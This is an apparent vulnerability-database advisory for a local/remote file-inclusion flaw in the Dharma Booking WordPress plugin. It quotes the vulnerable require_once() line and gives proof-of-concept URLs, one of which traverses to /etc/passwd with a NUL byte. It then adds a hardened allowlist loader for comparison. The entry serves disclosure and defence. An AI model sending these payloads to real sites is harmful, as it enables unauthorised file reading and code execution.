Vendor: Dharma Booking
By: AMAR^SHG
CVSS: 7.5 (HIGH)
Type: File Inclusion
CWE: 98
Product Name: Dharma Booking
Affected Version From: <=2.28.3
Affected Version To: 2.28.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:dharma_booking
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/WAMP
2016

WordPress Dharma booking File Inclusion

The vulnerability is caused by insufficient sanitization of the user-supplied 'gateway' parameter in the '/dharma-booking/frontend/ajax/gateways/proccess.php' script, which appends '.php' to the value and passes it directly to require_once(). A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.

Mitigation:

Update to version 2.28.4 or later.

Exploit-DB raw data:

# Exploit Title: Wordpress Dharma booking File Inclusion

# Date: 03/22/2016

# Exploit Author: AMAR^SHG

# Vendor Homepage: https://wordpress.org/plugins/dharma-booking/ <https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>

# Software Link: https://wordpress.org/plugins/dharma-booking/

# Version: <=2.28.3

# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
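<?php
// Bootstrap WordPress so that get_option() is available.
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
// Vulnerable line: the 'gateway' query parameter reaches require_once() unvalidated.
require_once($_GET['gateway'].'.php');
//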
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
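
For comparison with the require_once() line shown above, here is an added example of a hardened loader. It is not the plugin's code or the vendor's 2.28.4 patch, which this page does not show. The gateway names (paypal, stripe) and both function names are hypothetical, and the inputs are constructed.

```php
<?php
// Added example: hardened gateway loading (not the plugin's code or its 2.28.4 patch).
// Gateway names and function names are hypothetical.
const ALLOWED_GATEWAYS = ['paypal', 'stripe'];

// Query values can be arrays (gateway[]=x); only accept a plain string.
function requested_gateway(array $query): string
{
    $g = $query['gateway'] ?? '';
    return is_string($g) ? $g : '';
}

function resolve_gateway_file(string $requested, string $baseDir): ?string
{
    // Exact-match allowlist: traversal sequences, URLs, stream wrappers and
    // NUL bytes can never equal a listed name, so they stop here.
    if (!in_array($requested, ALLOWED_GATEWAYS, true)) {
        return null;
    }
    // Defence in depth: resolve the path and confirm it stays in $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or module file missing
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo on constructed input: a temp directory holding one allowed module.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gw_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'paypal.php', "<?php // stub\n");

$queries = [
    ['gateway' => 'paypal'],                        // allowed, file exists
    ['gateway' => 'stripe'],                        // allowed, file missing
    ['gateway' => '../../../../../../etc/passwd'],  // traversal value from the PoC
    ['gateway' => "paypal\0"],                      // NUL-byte suffix
    ['gateway' => ['paypal']],                      // array instead of string
    [],                                             // parameter absent
];
foreach ($queries as $q) {
    $file = resolve_gateway_file(requested_gateway($q), $dir);
    // A real handler would require_once $file, or answer 400 when it is null.
    printf("%-45s => %s\n", json_encode($q), $file === null ? 'rejected' : basename($file));
}
unlink($dir . DIRECTORY_SEPARATOR . 'paypal.php');
rmdir($dir);
```

Keeping allow_url_include disabled in php.ini (the PHP default) blocks the remote-inclusion variant independently of this check.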